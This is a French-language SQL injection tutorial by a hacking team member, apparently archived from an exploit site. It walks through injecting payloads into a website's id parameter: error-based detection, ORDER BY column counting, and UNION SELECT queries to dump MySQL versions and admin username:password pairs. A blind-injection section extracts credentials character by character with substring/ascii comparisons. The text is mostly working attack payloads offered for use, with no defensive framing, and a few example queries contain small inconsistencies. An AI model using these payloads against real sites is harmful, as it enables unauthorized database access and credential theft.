[french] Petite Explication Du SQL INJECTION [FRENCH] Full SQL injection Tutorial Par Moudi - EvilWay Team ( MySQL

) *** Sommaire *** __________ Chapitre I) __________ 0) 1) 2) 3) 4) 5) Description : SQL INJECTION. Comment reconnaitre qu'un site est vulnérable a un SQL ? Trouver le nombre de colomns. Utiliser la fonction UNION. Trouver la version du MySQL. Trouver les noms des colomns et tables et l'exploitation.

__________ Chapitre II) __________ 1) 2) 3) 4) 5) Description : Blind SQL INJECTION. Comment reconnaitre qu'un site est vulnérable au BLIND SQL ? Trouver la version du MySQL. Tester si la sélection marche. Trouver les noms des colomns et tables et l'exploitation.

---------------------------->>>>>>>>>>>>>>>>>>>>>>>>>>>> ---------------------------->> Passons aux choses sérieuses maintenant... __________ Chapitre I) __________ 0) Description : SQL INJECTION.

Le SQL INJECTION est l'une des communes les plus vulnérables dans les applications type " web " de nos jours. Il permet d'exécuter la requête dans la base de données et d'avoir grace a l'url a certa ns renseignements confidentiels et bien d'autres... =============> 1) Comment reconnaitre qu'un site est vulnérable a un SQL ? Commencons ce tuto en force ! Prénons un exemple d'un site par exemple: http://www.site-exemple.com/news.php?id=9 Maintenant, il faudra tester si ce site est vulnérable par SQL, c'est simple , nous ajoutons un ' ( quote ) et donc l'exemple deviendra : http://www.site-exemple.com/news.php?id=9' <= quote ajouter ! Maintenant, si vous appercevez une erreur du genre: "You have an error in your SQL syntax; check the manual that corresponds to your

MySQL server version for the right etc..." Ou une erreur de cet exemple, cela signifie que ce site est vulnérable par SQL. ^^ =============> 2) Trouver le nombre de columns. Pour trouver le nombre de columns , on utilisera " ORDER BY " qui demande a la b ase un résultat. Donc maintenant, comment on utilise cela? Eh bien simplement augmenter le nombre jusqu'à ce que nous obtenons une erreur comme dans l'exemple ci-dessous: http://www.site-exemple.com/news.php?id=9 order by 1/* <-- no error http://www.site-exemple.com/news.php?id=9 order by 2/* <-- no error http://www.site-exemple.com/news.php?id=9 order by 3/* <-- no error http://www.site-exemple.com/news.php?id=9 order by 4/* <-- error (une erreur du genre: Unknown column '4' in 'order clause' ou un truc de ce genre s'affichera) Cela signifie que l'on dispose de 3 colonnes, car nous avons reçu une cause d'erreu r sur 4. =============> 3) Utiliser la fonction UNION.

Passons aux choses un peux plus dure.. Avec la fonction UNION, nous avons la possibilité de sélectionner plusieurs données en u seul SQL a la fois. Donc nous aurons: http://www.site-exemple.com/news.php?id=9 union all select 1,2,3/* (nous avons d eja trouver que le nombre de column est bien 3 , revoir la section (Chapitre I , cours : 2). ) si nous voyons quelques chiffres sur l'écran, c'est-à -dire 1 ou 2 ou 3 alors l'union a fonctionné. Si cela ne fonctionne pas , essayer de changer le /* par -=============> 4) Trouver la version du MySQL. Disons que nous avons le numero 2 , maintenant il faudra connaitre la version My SQL , pour cela nous allons remplacer le numero 2 par @@version ou version() et nous aurons quelques choses du genre: 4.1.33-log or 5.0.45 ou du meme type... alors l'exemple sera: http://www.site-exemple.com/news.php?id=9 union all select 1,@@version,3/* Bingo , la version du MySQL est devant vos yeux :) =============> 5) Trouver les noms des columns et tables et l'exploitation. Maintenant si la version est < 5 ( 4.1.33, 4.1.12...) , vous devez savoir que le s noms de table commun pour cette version sont: user/s , admin/s , member/s .... .....

pour les columns c'est: username , user, usr, user_name, password, pass, passwd, pwd .... Passons a son exploitation: Cherchons la table d'admin: http://www.site-exemple.com/news.php?id=9 union all select 1,2,3 from admin/* Si vous appercevez le numero 2 , alors cela signifie que vous venez de trouver l a table d'admin et qu'il existe... Cherchons les noms des columns: http://www.site-exemple.com/news.php?id=9 union all select 1,username,3 from adm in/* (si vous avez une erreur ici , alors essayer un autre nom de column) Si nous avons le nom d'utilisateur qui s'affiche à l'écran, par exemple, être admin ou superadmin etc alors c'est bon... Maintenant pour la column de mot de passe, http://www.site-exemple.com/news.php?id=9 union all select 1,password,3 from adm in/* (si vous avez une erreur ici , alors essayer un autre nom de column) Si nous avons le password a l'écran du type hash ou sans, alors c'est bon, le type varie en fonction de la base de donnée Il ne reste donc plus qu'a les mettre ensemble avec 0x3a , qui est une valeur de hex pour la colonne. http://www.site-exemple.com/news.php?id=9 union all select 1,concat(username,0x3 a,password),3 from admin/* Vous allez voir quelques choses du genre: username:password , admin:admin , admin:unhash.. =============> =============> __________ Chapitre II) __________ 1) Description : Blind SQL INJECTION. Le blind se définit comme le sql normal sauf qu'il est un peu plus dure.... =============> 2) Comment reconnaitre qu'un site est vulnérable au BLIND SQL ? Prenons un exemple de: http://www.site-exemple.com/news.php?id=9 Quand on ouvre la page , nous voyons des articles, images ou autres... Vous pouvez donc tester le blind : http://www.site-exemple.com/news.php?id=9 and 1=1 <--- ceci est toujours vrai ! Si la page se charge normalement , c'est bon. http://www.site-exemple.com/news.php?id=9 and 1=2 <--- ceci est faux Donc si quelques textes ou images ou un truc est oublié ou déformer, alors ce site est exploitable par le blind SQL.

=============> 3) Trouver la version du MySQL. Pour avoir la version dans le blind, nous utiliserons le " substring ". http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=4 Si la page s'affiche normalement, alors c'est une version 4. http://www.site-exemple.com/news.php?id=9 and substring(@@version,1,1)=5 Si la page s'affiche normalement, alors c'est une version 5. =============> 4) Tester si la sélection marche. Quand le select ne marche pas, nous utiliserons donc le subselect. Exemple: http://www.site-exemple.com/news.php?id=9 and (select 1)=1 si la page se charge normalement, alors le subselect marche. et si nous voulons voir si nous avons l'access au mysql.user , on fait: Exemple: http://www.site-exemple.com/news.php?id=9 and (select 1 from mysql.user limit 0, 1)=1 Si la page se charge normalement, alors nous avons access au mysql.user et nous pourons avoir quelques mot de passe en utilisant la fonction load_file() et OUTF ILE. =============> 5) Trouver les noms des colomns et tables et l'exploitation. Exemple: http://www.site-exemple.com/news.php?id=9 and (select 1 from users limit 0,1)=1 Si la page se charge normalement sans erreur alors la table users existe. Si vous obtenez une erreur , alors vous devez changer le users et mettre autre c hose, a vous de devinez :D c'est un bon jeu hein... disons que nous avons trouver la table.. maintenant nous avons besoin du nom de la colonne.. tout comme cela du nom de table, nous commencons la devinette !! http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Si la page se charge normalement, alors le nom de la colonne est password. Ainsi , nous avons la table et la colonne , exploitons :) http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>80 Nous continuons a changer le " 80 " jusqu'a trouver une erreur, suivez bien l'ex emple: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>95 Nous avons eu une fois de plus un chargement normal.. on continue

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>98 Pareille, continuons http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>99 ERREURRR !!! donc le premier caractère dans username est char(99) si vous convertis ser cela en ascii nous avons la lettre " c " . Maintenant cherchons le second caractère: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),2,1))>99 Noter que je change ,1,1 a ,2,1 pour avoir le second caractère http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>99 La page se charge normalement http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>107 ERREUR nombre inférieur.. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>104 Chargement normal , élevé. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x 3a,password) from users limit 0,1),1,1))>105 ERREUR donc nous savons des a présent que le deuxieme caractère est char(105) et que c'est 'i ' , cela fera "ci" jusqu'a présent... Faite cela en mode croissant jusqu'a ce que vous obtenez la fin. (si< 0 retourne faux, nous avons atteint la fin alors). ---------------------------->>>>>>>>>>>>>>>>>>>>>>>>>>>> ----------------------------Nous voici a la fin de ce tuto... Si vous cherchez bien sur le net , vous pourez avoir plein de programme qui fero nt tout ceci , mais apprenez a le faire manuellement, c'est important :) . Je remercie ma team ( EVILWAY ) Je remercie MizoZ, ZuKa, str0ke et tout ceux que j'ai oublié... J'espere que ce tuto vous a aider en quelques choses... Contact MSN: m0udi@9.cn Second name: SixSo Nice site that i love: http://www.opensc.ws/ # milw0rm.com [2009-07-02] © Offensive Security 2010

Sign up to vote on this title
UsefulNot useful